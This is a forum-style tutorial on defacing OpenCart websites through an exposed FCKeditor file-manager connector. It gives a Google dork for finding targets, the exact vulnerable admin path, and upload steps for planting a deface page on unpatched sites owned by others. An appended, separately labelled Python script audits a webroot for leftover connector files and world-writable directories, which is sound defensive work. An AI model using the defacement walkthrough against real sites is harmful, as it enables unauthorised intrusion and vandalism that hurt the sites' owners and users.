[TUT] Deface via OpenCart [TUT]



This method uses FCKeditor to deface websites whose admins have not CHMODed or otherwise protected their directories. That gives me access to their directory, so I can use FCKeditor to deface the site and leave a security warning for the webmasters. I will show how to deface websites using FCKeditor; follow the steps below.



1) Create your deface file first, using the .html extension,
     for example deface.html
2) Search on Google, using this dork: Powered by OpenCart.
     You may also add a search for certain domains, like .com.
     Example: Powered by OpenCart site:.com
3) Exploit for OpenCart: /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html.
     Check the search results one by one for a site that has not been patched, and enter the above exploit.
     Example: www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html,
     Example 2: www.site.com/cms/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
4) Replace the connector: ASP to PHP, select the file, then upload.
5) OK, so your deface file will be like this.
     Example: www.site.com/deface.html
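
A defender-side audit for the two conditions the post relies on, a deployed FCKeditor file-manager connector directory and loosely permissioned directories, as an added example that is not part of the original post. The function names and the sample tree are assumptions made for illustration; only the connector path comes from the steps above.

```python
import os
import stat
import tempfile

# Path fragment from the post; function names and the sample tree are assumptions.
CONNECTOR_DIR = os.path.join("fckeditor", "editor", "filemanager", "connectors")


def audit_webroot(webroot):
    """Return (connector_files, world_writable_dirs), both relative to webroot.

    connector_files: every file below .../fckeditor/editor/filemanager/connectors/
    (test pages and upload connectors that should not be deployed).
    world_writable_dirs: directories that any local user can write to.
    """
    connector_files, writable_dirs = [], []
    for dirpath, _dirnames, filenames in os.walk(webroot):
        rel = os.path.relpath(dirpath, webroot)
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            writable_dirs.append(rel)
        # Match the fragment on path-component boundaries, case-insensitively.
        padded = os.sep + rel.lower() + os.sep
        if os.sep + CONNECTOR_DIR + os.sep in padded:
            connector_files.extend(os.path.join(rel, f) for f in filenames)
    return sorted(connector_files), sorted(writable_dirs)


def build_sample_tree(root):
    """Constructed sample layout for the demo; not a real OpenCart install."""
    conn = os.path.join(root, "admin", "view", "javascript", CONNECTOR_DIR)
    os.makedirs(os.path.join(conn, "php"))
    for name in ("test.html", os.path.join("php", "connector.php")):
        open(os.path.join(conn, name), "w").close()
    image_dir = os.path.join(root, "image")
    os.makedirs(image_dir)
    os.chmod(image_dir, 0o777)  # deliberately loose, to show the finding
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        files, dirs = audit_webroot(build_sample_tree(tmp))
        for f in files:
            print("remove or deny at the web server:", f)
        for d in dirs:
            print("world-writable directory:", d)
```

Call `audit_webroot()` on your own document root; anything in the first list should be deleted or denied at the web server, and anything in the second should have its permissions tightened.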

Website List: